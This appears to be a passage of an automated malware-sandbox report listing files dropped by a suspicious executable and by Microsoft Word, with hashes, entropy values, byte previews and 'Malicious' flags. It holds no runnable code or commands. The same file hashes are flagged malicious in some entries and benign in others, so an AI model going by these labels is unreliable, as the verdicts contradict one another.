                                                  Preview:}flovqcu~qgfgbig.kg.xu~e.nlt~ct{jtuqxgud}or|erbebdxcumdrovhijzacy{uzzm.l|qv`{}kxxls}w.}|f{tccunae|w`rn}wzt`vrogzwxfx{}|oqhy~ve~dkzbcx|w}omsbky`xzvepfc}}wy|tqg|wdgvcfpybve{esuvfl}scccllumpound|oktv}~rb|c}zl{bp~twb|z|fvryu|zezm~xra.}kmzehz`a{}xl}btpv~wwsbzn.gyamf~gvwajxm}~tliipidscmffr{aeqvp}c|e.tybju~s|lrilurcs.dpbz.i.z~vgj~tnpxe.kfqam|qufv{b}iorgtldzppvvrpqglak{r.dsupgvy{zu}|qot`a}lmyt}a|amtatyp`ceukof{ubik}x}hdty|yzswgt|`v`.l{xre}aq~r{zwv..e.gp~}nsaz~j}.k{mrnxedtvcv|yzpyphhdbri`vwr~}pa}agyesz`trwcdaspwacauw|fpi{mak.ryuck{{{gxbausd}rq}u}g`irmmy|~|v}{rsztt`bcr.m}~e~kpn.~xqputt`juavw}pgt}rsg}efinrfwb`ktqavvbssjz~x{e|`~xg}ytjicm|.rzf}tt|p~gzuhjpwtfscv`{{|ucaglpiuvq`cqvu~sxqupvtnuk.xtop{iwdt~x{gbxpu.uo~qp~gija~vsu`~wwf|cm`.w~.pz|r{rdtdq{jjxm}mb|xn.vqttcdufkpfqbsggw`tjk`{a~gfr~vmgu.zgg.{{uz`uwcorxrw|fz.ztgwgac..tihrt.hcafu.ulee`edxlh~|ar~rglzq}cmwtqfyp.|y`rfbe|.i.fxsiio.bbxntdxlvt~ngqr`uzjstl|kua~.qb~p|lpgm~zqcl.pw~~xuq.`oxdk.fmyu~fkll|kbm}|bs`xceyzeeq.{~k~gjy}}ak~|~w.xd~ffy}`zw.~lctd|k.gz~
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.958005779190394
                                                  Encrypted:false
                                                  SSDEEP:24:gCD2H8fbe5q96Fh6LlTVw2FcVRmeMfp/cR8q7vG1dYf7Ltbb:gj5O2+1VER5axi8q7vG1GLtbb
                                                  MD5:58A8C6F9B4D2AEDA202460E785B7FDC3
                                                  SHA1:B3063A5D6E20C521F613DEFC6778AF7E25DC39A8
                                                  SHA-256:3F6420CD0D659D532EA3981B40AF41CB6B47C32126F31C62C739EEB74DD3669B
                                                  SHA-512:2FD798F8BFB31A5D5C228FA4DEC71C50A621A06B1F0AFFF8D2B38B6AF541A6E45EDA0784CCE155BBED1F94D38C4409865B0E370E509325061A4B3706DD4DE27B
                                                  Malicious:false
                                                  Preview:e}b}r`}meik}bftmudr|e}pwc~nvciyxvlap.~vzihclxm|fryyqvd.iogcsap{.tx`f~qr}rmdlvdvwxb|lzyyyy{s~pytzy}tyofnyvfry{mmt`tfh.xedetypua}k}nqjbuvbmd{q`szfw||attps`}`rdxl|gkprexunddcu`wvrluip`t|m.nxrxnq~zaq`}.pdr{fvpdq|cqk}jf}qhgfdtfr`zswe}e~sg||nrj}us.{zvj~r`zvczo{`zpwe|}~v|liupksvthszydtrtpb~uiikjg~aoe.ddvr.zuxzbpltpyyjwwapzcuonicdg||v`t~zyjqtevg~i~yp{oefxwbjt{orvp.}qirptrg`z}idomvjbn{etzv`xw.m~fedgbbyqfsjg|jl{lwvpbg.qhvptwad.zdrfkh~e}lu}vcubfpkisvzyheczgp``t}.rs|}c~e~seiybiremppbkwapsla.aqfw~k.zyprr.lcocl.tycpda`pcuvd~w.a~jtfv.}waob`|~zzx.ca.hyq|ozj}dax.ui|cslyze~}syk~.wwxyq|opda|p`|yuuv|gwtdq{plc}b|ytvk|yqe{}krxw|cnhcb|ad~nui|c|ouz|~vyutg}yuy`wppplk}.ojxkxp.v}x{eeuuhmo{fmwf}sp|te.euc~hizxsbsjgq.xs`bbd{rl.c~gz{rcbz.bvs`aear`grd|dd`b{p`{gbr~annffp}yud~fjvpy{yjku.tqeweial.d`upffwktix~bbyeznzumq.ctg}~krx{jz|gub`ked`ni{vc.rp`|b~nlksfxucvps|.xqhebfgbjstmdpt~.smadzuvqnddks.fpqfqke{ywt}gabuj~u.lq|y.axlh}u.zcxlpzfn}ztks{ottu}}.dh`y.w}fzkqte~cwyce{nme{susqwdv}u~e~gz.|u`cb~hutsgutfzglge~{s`yzwjt.vuiij.b
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.943824797057364
                                                  Encrypted:false
                                                  SSDEEP:24:nFfF/GOMBMlTTA5Q4RJXAUBobpGUOLPfL3Dk9aW+C5upW9B:n86lfB4PAYUGUiLT+ahCRB
                                                  MD5:25C5BB9BD6764270F95F127A8FD67561
                                                  SHA1:2D09773F0376DC9132029C2EC8DFD8C857542F06
                                                  SHA-256:00DBAB57ECA07804C0CABB4CC7B5A7140BE7578EC380CD24CB4DE88507EB01FE
                                                  SHA-512:029C4ECAB84CD0D251C5AD10AD76B1DCBE78BE3BF90B69F0C6F08385E8B8F1A5816718D55F85A153E9790A5D5FC7F4E7F816426AFFA62C1DD5890D2C5CBCFD55
                                                  Malicious:true
                                                  Preview:dz`|b|ylizxfcxucxy`iz{z.z|i{eet`pjadpaqeb.gsut|yvpld|vvwnwboxc~gmzvb`wtzraeob`skvfrq`qu~dcvb.kstsn{dtl`dk~ts}tyt}bqwytcllrxgq.rr|`duwutl~bcetb~d~aakdb}quphlwxbmhquxqzob|ve.sohfvyl}uu~rwiucpo{{zzwzwj`gd{`wj~bk.k~{uq|syupa{mtyzft`zcvutrby}y{todjyokdast`qzwarqts.plpne|kaqx|ccyzbbtg``m|~pq|onv}{lv}~xgqndxgcufw|.gzpyec{.v{pv`pfesppe|nuwt|wvyxdxg`~yrds`||cepoknffttzgvx~le}v.~ayrasngw.drjyea{}vy}dq`un{wxa~t.p.aytwystids|uv`qz.{|paz~ook}ru.gwvbh.}ns|}krby{zzut|.z`lbz|~xcozawfxrykztwsox.~qwp.fsemg~x}j{|{`{hrf.m|j}rpx|ytoxw~hapgsbiu.vx}|fnn{bqar{a{`djyskpjhom|rb{{xbretmy.r|butloxnprtgp`bzzpj~ikimqcr`p}ka{dsqcy|t`|qdznnicb`fz}|rv|khmxvpxsfxz|wyio.~z~abalt`h.|a}o`|ovxpcgto~mwy}cxfycnqgpeas}|.qxrrzynm|{yoptevpplvgigb{ba}me.tby{`r.gfrtt|cs|pzzp|tgvtmzw`kqeqbez{fixudl~a{{~yb|s.ci{~~~zfhh}b{r{wp`c~o}rvpb`bspps{|{pu`rvcuyoafmzf.ewyj~ewdl|xxtianwx|`{}wwwyp}bq`zr~{vvfw`pwwoepk~v}~x`~~xf{aewe}t|qncdfwu{k~qxbhtk~lwksqkb.d|rgpllaequl|ptb}.u.{rwfe.ev}qqjjxzycgbk.bps~i.yfw~k~yxnir}lbd{|ft}~qdvq.jbvrnpl|wh.tdz
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.949025847462668
                                                  Encrypted:false
                                                  SSDEEP:24:55FNAZzdEPxx0IV620WHkBEPbXMQujohHEEyigCK0:FExEPxxx/TkBEjMohhfpK0
                                                  MD5:C129E3722D20C8D40D136F43430362DD
                                                  SHA1:F43A255518378C1989420AD17435AC7E74D416ED
                                                  SHA-256:02C5C8ABA48146B66661E55BBAB32A832A88D6FB1E8137892FCB96FACD8C10A1
                                                  SHA-512:8107242D4741A6FD7972D4B3C767AD19269482A5C036649725A7536AE8DF9B3B86A6B36A6AC081E99197BDA371A72F31D778F2E2403A84A3D30135265EE5B535
                                                  Malicious:false
                                                  Preview:ddlsfvt{wk}epd.{`to|~iocqf~.uf{eby}a}n}zuadgyjgfzol}i`v~yieqcepw|~xvfq.nzyvxuxqzp~ylsecyqp}.a}rv|lztqqisgfegu|tf|pikizf|sssy}dpwanauykwtjtc`juq|rdcmrfflrg..ymyobxabqbwnc}fid~vemprazif`ivfpcwe}bhzyli|vqe|wkdd|uy.akraq}ya.bm.kuop`tswpq~}}xf{fcy`q~qcxypq|o|`s}`pc`quber.{nh}yli.cx``j.dujzwanjoo.yvkel~gbzx~~x{lztvzvx{eld|a.mfypyumqenobdduaisaoffyilldcosg}qbz|`nd|gjvwkz`|axbztyi``.d~`u|j|qdy`qu~sfyd}ypyk.sxmzsy~vzow{udrspsrllqzw.b`oauqpeunehiadryyhjbnsyiqgrdbasctgc~}uiwycuxou}upy.dlgrbqjdykkn`zzxsow{~xhekwp}u{ucfsdhm~pxtb|vu~{~zsevzbta.~|pycwdlzwu.`kgqeqjf}w}fig`syj|r..q`i|mfa~kftqrxbodca|iaizvurx{}qzcnqydoichmzbw.`ce`o.pgnjtw`llsbpqgtjywbkora~gd|l}z|qcyu}dbwx~ky{ap`deo|v`bg{|}b`u`|gat}p|zpawzrcndcvdqsz.fr`vbfrlveyou`b.ayhp{ey}.et{tr.tvd`but}vwt{`i|.x|qnu`gti|`|ta.ic{`yimyy`fvv~~px{{x}taxznxvcfv~.~|tny}rc}j}bywtias.opdlbkj~z~nv}ytcbvvzl~bwdzxbvrtqt~xxwk`}wjkj}t~jux`i~wgohw|b}be.qcv{uuyrwymzbz|~fqb|fxj`.yfcv}rwqnqayyrqjppbprpsbhq``ptqcfdqmsd|wj`lwsxomsayxgy~dzfu}wolgsq.x{ipxk|a~zxec.afgo`sjq.
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.94113137895782
                                                  Encrypted:false
                                                  SSDEEP:24:TOJ6fH3p0DjqfjR8M9jei4A2n2SItybrE57p9:TOJ6fH3psqRt4YSItybM9
                                                  MD5:75228F1F3AA87FB6C316017A6F3F2CCF
                                                  SHA1:63E1528AA0DF1C1852E6CCB8504FE8915EA61E88
                                                  SHA-256:B8EDFC10439D46014BAAE227CE600064BF8D07C6B412A89E74F2DEE93651D7E0
                                                  SHA-512:79C956B3057A5F9614A98BFABC244757D0F1EF7A44CBA1DE857CD1248E34A9FA28389268E17869A27151698AA1B9C5E9A3E83CBBAB7A7688CFA92657087C9314
                                                  Malicious:false
                                                  Preview:kk`qtcqjptdcoc|mbvqrhsuz.wye|en.ej}t.aigr.zsfb.{jaqfyt`rsi|okzopk.e}z`il~pb~aa~w|mlopb}}pu~azu`ytaqpf~ifxzus}yxycftvkxwmf{h}ql|gitzf`|rsl`rq}z.rp{ktuxdfez}v|wzofrcyleqrtjy}{kh~dg|itjy{y`yvbb`|a}xmlaijvq`.mox.lr}{.qmu~.uxfowsvyfpfiotgytq`r.eb.`rorpt}w`|sduwbvlcfl~|kogar`vc}{`uinpv{m~kszyicddolg{xwd.}|zd{ikmudmx{zzyltpsscx`.fqow~piik|{|tnyn.frib.fxwb{gk|`kumge}ddio{mq~dyfgykob}dnkvo.qp~qdixz`bs`vtekgnw{sn{hdbqgwbtmazah`mxygjvv{dsw.m}|lizs`y~to`|in}ti`zjpa~mm|wqsarat.cwrs}yb|slptz}g}qfvfq|agfrf{l|}qnwydrlu|`credbq}qpzax.`|puyvtbui|kxgwcy`zaps.r}z{teka.``bw}wjq`fn~nt|j.`~b.uadje|~pnyvpetfpmfzu|~uuf{}pfr~sri`k|{ct}cu{{`ib`d.ttrhtwqw`.x.mgbn.{gbewclybv{~~ap.bmgw.wy`kwv|.kfw{qtnzvvczf~`br.psg|tyd`~rt~ycq}qwbwixkyzzyv}ffp{jwxgy.rf}evtinrvl.fw`|l{ratxzqk}xpfwfyvl.vs~|tv}gqosv{aaioofsg{da{bftrf`c|{f}x}mu}`ex|gv{pgyttr|{prtqc~en}ta.zd|kx`td}bsbiu`frl}|}wy~ax.{}|exi{w{jryqurhm{tfgwexx`{plm~|q|dnoq{nagyu~mghdm~ydf{iextu}pgbetwyse||gtzxaajt`.eqttyprqgx`olt|bgqjo}dyzrada``tbcuat.}qej`xp|f{fnavagqzk`}
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.9570996395004
                                                  Encrypted:false
                                                  SSDEEP:24:RCrGEPv5COAENHcPskyaDKx6feXKS9bHi4RPc/KHX:ROPYO3DaOsfGKc3wK3
                                                  MD5:EE1EBDC404E8FB05E5F4DF3284EBF727
                                                  SHA1:C401AD3638F921977C26DEACE84803F9B8C54962
                                                  SHA-256:828BFA9D2FFCA4CD8D03757A4C2BCDB0285942C9B105C12BA760A06C1E7B770D
                                                  SHA-512:DF705C5D340822C3F6BCAC60BFB3FD9DCFCDF3FBC3399186E362A64AAC2EDB9ACE437EAA9658F635AB1128DD61AE1C905AA3786326E26EE0BF66313CE3A5747D
                                                  Malicious:false
                                                  Preview:xplxmo`{a`kr{pjpczsrytmwxgmwrjebvu{f|{{|qreqs{sp|oe~kcc{~cusc{rp.fp}c`tqpocsqf{ig~r.s|dff}ucqj.{gapaeg.{juytyu`abr{gktl}f`wt}y`azu~e`e|jibwtt`kfutkmqvjd`e{rbmwy|xy|oztanixqaktmtq`kwrese.|ug~}v}myd.paaz`ezn.apeaum{prsvk~{elbtexyfixt|lo.~urwg{a..vql}`uidxsnzevdpgyfb{ckfs`afcsdk~bfzhboyd}kwuerzjbuqu}jopzarc}zl||ppwf}pbay{uffi}|s`}.u.dx{|`a~|rgtbt~wbt~dkre~f~osgzyp`vfwtiebyx.rn}f.gvw}rgba`cy}|fdaffxfvpnsg`l.zyfwo.h.z|bk}vato.vhc}fo}.ezeoeraie}}lhyptb}meoubpxlryqdkw~z~sip~scq.~lqvdpbkv{.pkoyyidy`tnlx`mygk~su|cnq~wczk{aftskc`spmavyyj~okp{pmig`u{p{f}|eze{.ar|pwbpo|`sbveeahyjbc|ju}|olpknxia{chwfwauyffslf.xoeejzt.otci{iw`wvz..tnbybo.bxmv.`wldqr.r|paqv}zf{ix}`gzkupfwv|k`prxh`kzbgzqzo|zz{alw|sivibct{j`zxg{rjq~w|b`bkplgvu.v|vfjiognbrka|deqbxrbyp}`q|zjtavr|d~rzzevzbn{vrlxcgbzi`xmy.j|.rl|}`s.fdcdz}.jpyrt~cc.upwfzagnm~|szauo.tyhbbprs~agdcq.sqhmaaldivdrq|ctzdagjm{rsvikab}vkofucbbj~`driftgqmgkpsjaz`nv~ttyxry.pfnntin}hnregd}|jr`qu|.`|qvzyu`etp~{vx|{tq}iw{gls|d|zzk|o||}{tz.vrr{eabybqv}r|}dewpqp{izaxuci|q
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.945545010677277
                                                  Encrypted:false
                                                  SSDEEP:24:cauvXJIXJdonICoy7jAQNiSCegTZKlBNhF3iQLmfO1n:cauv5I5dontvzDCeWqTzLmmt
                                                  MD5:8FB9A5DC8FCF7D11CDA601AF916A36CB
                                                  SHA1:D20BD883B1C7184EA1305FB103EAA8D6C9C98CAD
                                                  SHA-256:9304B268C943050E2DD0AF0342ADB609850FCB9AFF3F615EDB007108794F333F
                                                  SHA-512:4E894BED7973BD188750F5FCF4D8D176386A47DBBC00872668FB1533A9DEC197990B2643FC2AA8A52572C5B3DE0C500F202007AFCA0605D4246C2F1F00D0F9EB
                                                  Malicious:false
                                                  Preview:|.zhvyokafqrtb{~pjxdipip{gv}yiqmppod}ni.{cw`~aukcsxprgvdobbnqxr}p{fupsj|voww{~tvtoshedibbw.gq.n~|{ayv.q{|k{cavzb~bzrnqdfavptzovbzxmi~|.onwm}|dyjtgck{yuqgdq.a{qrtrgymxprq~sapiccw{ivxic~k|uztdyuwvrtbbkxb{pire`i`rkjida`oavgu|~tgzjxdktoymdhdfxz{zucnwxjxrmoppru}~aa|~q|adz.{kqvp.{ryxxji.pkqeyn`epc~s}f.rfnpujgxxysy|`yrez~ptb~nxea~mk{rlkrgf}wx~qttfkpwweqszxiyd~p~n.rbwital~qtfkqu}y}etax~z}j|xt|.c~fwd`da`srpm|~pqmxyqlyr}dvul{|zuee}u.giwozqnd{{d{z.aolkzj}p.jkue.qeywno`gpif`e.vk~rx~i}lu|y{k|yi~muop}bxd`{}ymsosicqwgnsapfcd~usrxbcfx|zrv}ak`gitvdypmxevaapz|xqoi|yva|{i|yjdl.kx{`err{uvsbnipx}.wv`frsg.`q|zg{ugkzye}f{}ztuqv`yx~.}wnaeandcrdfbqqfopsak{`ry.}zq`vtjs~u.pwcctrknmusifp`qyg|dp{|m~vzc}uwruw|.g{btvgztnpnqoc|lcwwpwppi{xxnqyvz||.javgmuau}yu.x.|bizbzb.a|cvpqlvlqn|a.h}zr|uuvfxlgev.bbb.`tq`afjkkq`l~hvqqz`fsjf~t.fpdtsv}m~rlfk.|lxozbkjcv{}v{u|ab.nd.{ys}b~fiyyswbj|ns~mp~wwvs{iypet`.y~|ycykvgk`z|hqppgwb~nzl}s~jf~sduo`cz{wqpezduty}ysju}eqwi}am|z}}wzdfqim|zzax}bawzskdpklmbktzb}wz~{v}|ua~i~p.tydjov{v{ggnns~cr
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.937959220417419
                                                  Encrypted:false
                                                  SSDEEP:24:KkdAthZXfhrontpA0YdoTpFFEyYqHmNmJG7mTIkGPm0I7XwAp:K1vXfkeApIx2mNmJn3IRUXwAp
                                                  MD5:4D7DCAEFE7327806F8649E5D28E71B1F
                                                  SHA1:A05A6403073E7A5AA4CE96B79CBC154548A3D4B4
                                                  SHA-256:DA4EF69949EDC7EAC7C82082FC9BB5410E3CE0416015EA948D201AB32D5A099A
                                                  SHA-512:FB9C9003F310C136FF3C13AC4330BB1AF8042570F0C5DA7C8E765BDA139BFF225A3259D13BB04B91F0F7CCA381C89D1E2F7D92B867BACEA939B7580EC690109F
                                                  Malicious:true
                                                  Preview:f|u{q{sis}e.xqvp.jlpssabxgrzjzearvde}pkizrty.qt~vatuirggs~k{pmmxu`qtymdksn`wdzq`e..l.av{ca`ggyludltrgdjvgp~c.}`af|tk}ldcyv`erupuombp.rw`isrnqd||tov}zp~ay`q|~~.{hyyatum|niwyt.ld~q|aacnv|o~gqdfvpnqsltv`xlcppaacq.t~wr|`tse}wze`vgtwgp|sw|gls}yqbkjdrj}pbnczfb{s{jp}f|r`}qvx~zcgshkwiroaqcqv`urihb.obicf}.dpc`tarblrqvwntdiy|t~m.aap{zogyrovexftq{fb|~bxuu`sc.ht~frc}zdafcb.n|rdnaqtl|dtyreouwr{vxtkiert{avob.ugdyx{tn|yxiyre{yfi~~cz|{bbl}be`xwtyuva{}hc}xf|va.|bri}sydpfl.b|ytpfadv`uq}|uuuslrezlarqwgksgtan|xpqcga`pxt~zga{tvgbha}~clibj.utv.pub{~{.j{.azeykecrt~y}d.djte{q~i{ydcyq|fyew}vpzmqqvwurv|lppk{w}l}lf.sr~c`|}|sokgptizg`ttwvd{l~krpf~zzq~`lyu~k`}zgnyb}qdd~`~ldvkk|ya`jno.l{cba{prrd}cor}q~m`fe`zvywdjcdtrxbobcaeifz`xmxu}x.p{io}awrc|rvma`z|jan{b~pu.caz~p`t~rsuun{disnazip|`rxsl.kvym.w}|jgctaq`cb~vkbbrciu`iggg~aoscn`vagoy{nncpqhwwtcp|~.gxgtofntejf{n`bd}eyiqcyurqbbjawuz{`bwav`zauufyyp}wxyv|pyp{gf{s{b}tzcpkwfgk|vaz~x~cp{cbzjis|.}}ii`miny.p.bhaa{x|vb|iy|a.p}xcdivzbfx{w~tg|bny|e.tc{ufqaiavwzf.lpuanaeu~sboibp.x
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.958005779190394
                                                  Encrypted:false
                                                  SSDEEP:24:gCD2H8fbe5q96Fh6LlTVw2FcVRmeMfp/cR8q7vG1dYf7Ltbb:gj5O2+1VER5axi8q7vG1GLtbb
                                                  MD5:58A8C6F9B4D2AEDA202460E785B7FDC3
                                                  SHA1:B3063A5D6E20C521F613DEFC6778AF7E25DC39A8
                                                  SHA-256:3F6420CD0D659D532EA3981B40AF41CB6B47C32126F31C62C739EEB74DD3669B
                                                  SHA-512:2FD798F8BFB31A5D5C228FA4DEC71C50A621A06B1F0AFFF8D2B38B6AF541A6E45EDA0784CCE155BBED1F94D38C4409865B0E370E509325061A4B3706DD4DE27B
                                                  Malicious:false
                                                  Preview:e}b}r`}meik}bftmudr|e}pwc~nvciyxvlap.~vzihclxm|fryyqvd.iogcsap{.tx`f~qr}rmdlvdvwxb|lzyyyy{s~pytzy}tyofnyvfry{mmt`tfh.xedetypua}k}nqjbuvbmd{q`szfw||attps`}`rdxl|gkprexunddcu`wvrluip`t|m.nxrxnq~zaq`}.pdr{fvpdq|cqk}jf}qhgfdtfr`zswe}e~sg||nrj}us.{zvj~r`zvczo{`zpwe|}~v|liupksvthszydtrtpb~uiikjg~aoe.ddvr.zuxzbpltpyyjwwapzcuonicdg||v`t~zyjqtevg~i~yp{oefxwbjt{orvp.}qirptrg`z}idomvjbn{etzv`xw.m~fedgbbyqfsjg|jl{lwvpbg.qhvptwad.zdrfkh~e}lu}vcubfpkisvzyheczgp``t}.rs|}c~e~seiybiremppbkwapsla.aqfw~k.zyprr.lcocl.tycpda`pcuvd~w.a~jtfv.}waob`|~zzx.ca.hyq|ozj}dax.ui|cslyze~}syk~.wwxyq|opda|p`|yuuv|gwtdq{plc}b|ytvk|yqe{}krxw|cnhcb|ad~nui|c|ouz|~vyutg}yuy`wppplk}.ojxkxp.v}x{eeuuhmo{fmwf}sp|te.euc~hizxsbsjgq.xs`bbd{rl.c~gz{rcbz.bvs`aear`grd|dd`b{p`{gbr~annffp}yud~fjvpy{yjku.tqeweial.d`upffwktix~bbyeznzumq.ctg}~krx{jz|gub`ked`ni{vc.rp`|b~nlksfxucvps|.xqhebfgbjstmdpt~.smadzuvqnddks.fpqfqke{ywt}gabuj~u.lq|y.axlh}u.zcxlpzfn}ztks{ottu}}.dh`y.w}fzkqte~cwyce{nme{susqwdv}u~e~gz.|u`cb~hutsgutfzglge~{s`yzwjt.vuiij.b
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.94113137895782
                                                  Encrypted:false
                                                  SSDEEP:24:TOJ6fH3p0DjqfjR8M9jei4A2n2SItybrE57p9:TOJ6fH3psqRt4YSItybM9
                                                  MD5:75228F1F3AA87FB6C316017A6F3F2CCF
                                                  SHA1:63E1528AA0DF1C1852E6CCB8504FE8915EA61E88
                                                  SHA-256:B8EDFC10439D46014BAAE227CE600064BF8D07C6B412A89E74F2DEE93651D7E0
                                                  SHA-512:79C956B3057A5F9614A98BFABC244757D0F1EF7A44CBA1DE857CD1248E34A9FA28389268E17869A27151698AA1B9C5E9A3E83CBBAB7A7688CFA92657087C9314
                                                  Malicious:true
                                                  Preview:kk`qtcqjptdcoc|mbvqrhsuz.wye|en.ej}t.aigr.zsfb.{jaqfyt`rsi|okzopk.e}z`il~pb~aa~w|mlopb}}pu~azu`ytaqpf~ifxzus}yxycftvkxwmf{h}ql|gitzf`|rsl`rq}z.rp{ktuxdfez}v|wzofrcyleqrtjy}{kh~dg|itjy{y`yvbb`|a}xmlaijvq`.mox.lr}{.qmu~.uxfowsvyfpfiotgytq`r.eb.`rorpt}w`|sduwbvlcfl~|kogar`vc}{`uinpv{m~kszyicddolg{xwd.}|zd{ikmudmx{zzyltpsscx`.fqow~piik|{|tnyn.frib.fxwb{gk|`kumge}ddio{mq~dyfgykob}dnkvo.qp~qdixz`bs`vtekgnw{sn{hdbqgwbtmazah`mxygjvv{dsw.m}|lizs`y~to`|in}ti`zjpa~mm|wqsarat.cwrs}yb|slptz}g}qfvfq|agfrf{l|}qnwydrlu|`credbq}qpzax.`|puyvtbui|kxgwcy`zaps.r}z{teka.``bw}wjq`fn~nt|j.`~b.uadje|~pnyvpetfpmfzu|~uuf{}pfr~sri`k|{ct}cu{{`ib`d.ttrhtwqw`.x.mgbn.{gbewclybv{~~ap.bmgw.wy`kwv|.kfw{qtnzvvczf~`br.psg|tyd`~rt~ycq}qwbwixkyzzyv}ffp{jwxgy.rf}evtinrvl.fw`|l{ratxzqk}xpfwfyvl.vs~|tv}gqosv{aaioofsg{da{bftrf`c|{f}x}mu}`ex|gv{pgyttr|{prtqc~en}ta.zd|kx`td}bsbiu`frl}|}wy~ax.{}|exi{w{jryqurhm{tfgwexx`{plm~|q|dnoq{nagyu~mghdm~ydf{iextu}pgbetwyse||gtzxaajt`.eqttyprqgx`olt|bgqjo}dyzrada``tbcuat.}qej`xp|f{fnavagqzk`}
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal, Last Saved By: user, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Mon Dec 2 22:15:00 2024, Last Saved Time/Date: Fri Dec 20 23:13:00 2024, Number of Pages: 3, Number of Words: 464, Number of Characters: 2646, Security: 0
                                                  Category:dropped
                                                  Size (bytes):79360
                                                  Entropy (8bit):4.940460229989443
                                                  Encrypted:false
                                                  SSDEEP:768:PJVxj8RO3zkyUd0dTUY6SGEZcIj+GPzumTwgAua5xKmcBwKVj5aMEXaCzkFOOOOH:PBCCMSwUjAMaEOOOOOOxrtb
                                                  MD5:CE1DB03B794A1EA78C44020C38C24334
                                                  SHA1:EAFAE0E531555047B4F93E8C173F9740540F9116
                                                  SHA-256:71A0C5917C12CFD1CECBAE9BD2262A531A4BF5B8235A00567461E72432910448
                                                  SHA-512:7BA77947EF82E9D8A2B69A8888E5101828D24D65BAD10340B898402BCB484F9B8A5236ABC2E2613BCFFD2EDD505AAB5FF1EDDB90EC08EA22D975777D855AB45D
                                                  Malicious:true
                                                  Preview:......................>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ....................4.....bjbj0.0...........................R.eiR.ei&.................................................................................f.......f...............................................................................8...D...<.......|...........m)..@...........................................D.......D.......D.......S(.......(.......(.......(.......(.......(.......(..$....+......c...4....)..............................D......................."..."...D.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):4.5552397796041815
                                                  Encrypted:false
                                                  SSDEEP:3:kpy1kDknDknMuYW0mXNYRtodHGWIWJWdSDknJuLIh2OQasn:yFAnAnHYzmXyRadmuJZAnY22OPs
                                                  MD5:5D4361CF1E0E2D2E91212E74F9F53CFF
                                                  SHA1:7BBAE6A87D09A0BE4CD7C38E43356A5397A78EAE
                                                  SHA-256:3B923B997B9D7BFA92A02447D19CA389B8F4EEDF6FC845E0BAD3756D372C2E67
                                                  SHA-512:72D0F688E7F12EBE07B6F36E900EDF54ACA93E62D5F2CBFC2B475395B0EA152FBFEEA09BA0312662E59A9065BBDF8EBC2398B25E7DBC70CF02947769EDA53EEE
                                                  Malicious:false
                                                  Preview:6[WWPF68133653877363189556813365387736318955681336538723\3^8W5P6K133f!..)72631.h.68.1...".V.Z6318;556?.336538773631895568133653877363#895Bd...)5N..^......+5...Z
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal, Last Saved By: user, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Mon Dec 2 22:15:00 2024, Last Saved Time/Date: Fri Dec 20 23:13:00 2024, Number of Pages: 3, Number of Words: 464, Number of Characters: 2646, Security: 0
                                                  Category:dropped
                                                  Size (bytes):79360
                                                  Entropy (8bit):4.940460229989443
                                                  Encrypted:false
                                                  SSDEEP:768:PJVxj8RO3zkyUd0dTUY6SGEZcIj+GPzumTwgAua5xKmcBwKVj5aMEXaCzkFOOOOH:PBCCMSwUjAMaEOOOOOOxrtb
                                                  MD5:CE1DB03B794A1EA78C44020C38C24334
                                                  SHA1:EAFAE0E531555047B4F93E8C173F9740540F9116
                                                  SHA-256:71A0C5917C12CFD1CECBAE9BD2262A531A4BF5B8235A00567461E72432910448
                                                  SHA-512:7BA77947EF82E9D8A2B69A8888E5101828D24D65BAD10340B898402BCB484F9B8A5236ABC2E2613BCFFD2EDD505AAB5FF1EDDB90EC08EA22D975777D855AB45D
                                                  Malicious:false
                                                  Preview:......................>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ....................4.....bjbj0.0...........................R.eiR.ei&.................................................................................f.......f...............................................................................8...D...<.......|...........m)..@...........................................D.......D.......D.......S(.......(.......(.......(.......(.......(.......(..$....+......c...4....)..............................D......................."..."...D.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
